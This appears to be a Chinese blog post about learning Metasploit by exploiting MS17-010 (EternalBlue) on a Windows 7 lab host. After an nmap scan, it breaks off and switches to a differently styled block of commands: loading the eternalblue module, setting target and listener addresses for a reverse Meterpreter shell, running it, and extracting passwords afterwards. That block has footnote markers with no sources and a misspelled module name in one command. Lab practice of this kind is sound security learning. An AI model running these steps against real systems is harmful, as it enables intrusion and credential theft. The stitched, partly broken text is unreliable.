利用 MS17-010 对 MSF 模块学习

我之前写了一篇利用 MSF 里的永恒之蓝模块进行攻击初代 Windows10 还有木马制造.

现在看来只是写了简单的 exploit 使用,并没有开拓 msf 其他模块强大的地方.

Auxiliary 是什么?

Payload 、Post 又是什么?

这几者之间又有什么关联?

我当时在自学 msf 的时候,往往注重结果,而没注重过程.

我也许该重新了解一下这个 MSF 了,就用之前写的 MS17-010 重新盘一遍进行理解

准备工作:

攻击机: Kali Linux (IP:192.168.31.201,宿主机IP:192.168.31.30)

肉鸡: Windows 7 pro (IP:192.168.31.204,宿主机IP:192.168.31.30)

1. 肉机扫描

在这里就要用到 Auxiliary 模块

这个模块是辅助模块,可以用来扫描,破解,嗅探,漏洞挖掘等,在这里我将使用 Auxiliary 模块进行 ms17-010 扫描.

在开始之前,我们先用 nmap 扫描一下局域网内能连通那些机器(假装不知道IP)

nmap -sS -T4 192.168.31.0/24


叨叨念

其实可以试着用 nmap 里面的 vuln 脚本试一下

nmap --script=vuln 192.168.31.204

### 使用 Metasploit 执行 MS17-010 漏洞利用 #### 加载 EternalBlue Exploit 模块 为了针对 MS17-010 漏洞进行攻击或测试,在 Metasploit 中加载特定的 SMB 漏洞利用模块: ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue ``` 这一步骤选择了用于 Windows SMB 服务中的 MS17-010 漏洞——即著名的“永恒之蓝”漏洞的攻击向量[^1]。 #### 设置目标和配置 Payload 一旦选定模块之后,设置目标机器的相关参数以及选择有效负载(Payload),默认情况下会选择 `windows/x64/meterpreter/reverse_tcp` 这种反向 TCP Meterpreter shell 类型的有效荷载: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <local_ip> ``` 这里 `<target_ip>` 是指代存在潜在漏洞的目标主机 IP 地址,而 `<local_ip>` 则是指本地监听地址以便接收来自受害者的连接请求[^3]。 #### 验证并运行 Exploit 完成上述准备工作后,可以通过命令来检查当前设定是否合理,并最终执行实际攻击操作: ```bash msf6 exploit(windows/smb/ms17_010_etternalblue) > check msf6 exploit(windows/smb/ms17_010_eternalblue) > run ``` 需要注意的是,“check” 功能并非总是能够准确判断远程系统的脆弱性状态;因此即使返回不确定的结果也值得一试 “run”。 #### 后渗透阶段 如果成功突破,则会获得一个交互式的 Meterpreter Shell 或者其他形式的访问权限。此时可以根据具体需求进一步开展后续行动,比如文件系统浏览、密码提取等高级功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值